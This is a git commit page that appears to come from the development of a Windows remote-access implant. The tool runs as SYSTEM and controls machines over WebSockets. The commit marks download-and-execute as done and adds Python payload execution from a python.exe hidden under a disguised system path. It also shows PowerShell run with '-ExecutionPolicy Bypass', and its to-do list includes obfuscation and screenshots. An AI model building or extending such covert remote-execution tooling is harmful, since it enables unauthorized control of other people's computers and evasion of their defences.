feat: python
This commit is contained in:
parent
a208b0d0ce
commit
0b4d668d41
3 changed files with 11 additions and 3 deletions
|
|
@ -9,6 +9,11 @@ It is intended to run as NT AUTHORITY/SYSTEM, even if it uses WebSockets, becaus
|
|||
- [X] reliable websockets
|
||||
- [X] run\_as\_user
|
||||
- [X] basic commands
|
||||
- [ ] download and execute
|
||||
- [ ] dnx python
|
||||
- [X] download and execute
|
||||
- [X] dnx python
|
||||
- [ ] windows service
|
||||
- [ ] criticality
|
||||
- [ ] screenshot functionality
|
||||
- [ ] test payloads with arguments
|
||||
- [ ] get more ideas from The Group(TM) i guess
|
||||
- [ ] hardening/obfuscating???
|
||||
|
|
|
|||
BIN
embedded_py.7z
Normal file
BIN
embedded_py.7z
Normal file
Binary file not shown.
|
|
@ -100,7 +100,10 @@ pub async fn eval_command(text: impl Into<&str>) -> anyhow::Result<String> {
|
|||
_exec_args = vec!["-ExecutionPolicy".to_string(), "Bypass".to_string(), "-File".to_string(), file_path.clone()];
|
||||
_exec_args.extend(params.args.iter().cloned());
|
||||
}
|
||||
PayloadType::Python => todo!("py payload handling"),
|
||||
PayloadType::Python => {
|
||||
_exec_command = "C:\\Windows\\System32\\ExperienceOrientedReporter\\serialiser\\python.exe".to_string();
|
||||
_exec_args = vec![file_path];
|
||||
}
|
||||
}
|
||||
|
||||
// 3. Handle user vs system execution.
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue